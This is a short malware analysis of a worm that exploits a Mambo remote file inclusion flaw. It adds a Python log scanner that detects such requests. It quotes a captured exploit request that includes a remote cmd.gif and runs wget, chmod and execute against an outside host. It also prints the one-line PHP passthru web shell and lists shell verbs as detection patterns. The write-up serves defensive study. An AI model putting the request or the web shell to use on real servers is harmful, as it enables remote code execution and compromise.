by Javantea aka. Joel R. Voss
Analysis: Jun 16, 2004
Write-up: Sept 8, 2006
Botnets
A worm is currently spreading which targets a vulnerability in Mambo. The worm uses simple techniques to spread and leaves a mark on servers that do not have Mambo installed. The vulnerability is caused by a PHP feature that allows remote inclusion of files (remote file inclusion), which permits arbitrary remote execution of PHP code. The payload is currently not known.
Server logs from suzy.altsci.com (a development server) showed obvious signs of exploit attempts. A closer look gives us markers that identify it as a Mambo worm. The virus includes cmd.gif from a remote site; that file simply executes arbitrary commands in a shell using PHP's passthru function. The command it executes quite simply grabs the payload and then executes it.
210.202.197.100 - - [11/Jun/2006:11:37:57 -0700]
"GET /index2.php?option=com_content&do_pdf=1&
id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&
GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&
cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;
echo%20YYY;echo| HTTP/1.1" 404 284
cmd.gif Source:
<?php // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
passthru($_GET['cmd'] . " 2>&1");
?>
Commands Executed:
cd /tmp
wget 72.18.195.161/lnikon
chmod 744 lnikon
./lnikon
echo YYY
echo|
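The two markers described above (a config variable such as mosConfig_absolute_path pointed at a remote URL, and a cmd parameter carrying shell commands) can be picked out of an access log mechanically. The following is an added example, not code from the original write-up: a small scanner over Apache combined-format lines. The sample lines are constructed; the first reproduces the request shown above, the second is a benign PDF request for contrast.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (Apache combined format). The first reproduces
# the request from the write-up; the second is a benign request for contrast.
SAMPLE_LOG = [
    '210.202.197.100 - - [11/Jun/2006:11:37:57 -0700] "GET /index2.php?option=com_content&do_pdf=1&'
    'id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&'
    'mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/'
    'lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 284',
    '192.0.2.10 - - [11/Jun/2006:12:01:03 -0700] "GET /index2.php?option=com_content&do_pdf=1&id=1 HTTP/1.1" 200 1234',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)          # a value PHP would include over the network
SHELL_CMD = re.compile(r'[;|`]|\b(?:wget|curl|chmod|nc)\b')   # command separators / download-and-run verbs

def parse_query(target):
    """Split the request target into decoded (name, value) pairs.
    Done by hand so the stray second '?' in the worm's request and the ';'
    inside values are kept as data rather than treated as separators."""
    query = target.partition('?')[2]
    pairs = []
    for part in query.split('&'):
        if part:
            name, _, value = part.partition('=')
            pairs.append((unquote(name), unquote(value)))
    return pairs

def scan_line(line):
    """Return a finding dict for an RFI-style request, or None for a clean line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    indicators = []
    for name, value in parse_query(m.group('target')):
        if REMOTE_URL.match(value):
            indicators.append(f'remote URL in {name}')      # include path pointed off-host
        if SHELL_CMD.search(value):
            indicators.append(f'shell command in {name}')   # command string handed to passthru
    if not indicators:
        return None
    return {'ip': m.group('ip'), 'ts': m.group('ts'), 'status': m.group('status'), 'indicators': indicators}

def scan(lines):
    """Scan an iterable of log lines and return the findings in order."""
    return [f for f in (scan_line(l) for l in lines) if f]

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f['ts'], f['ip'], f['status'], '; '.join(f['indicators']))
```

Note that the request in the write-up was answered with a 404, so a scanner keyed on status codes alone would miss it; the indicators live in the query string.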
Unfinished.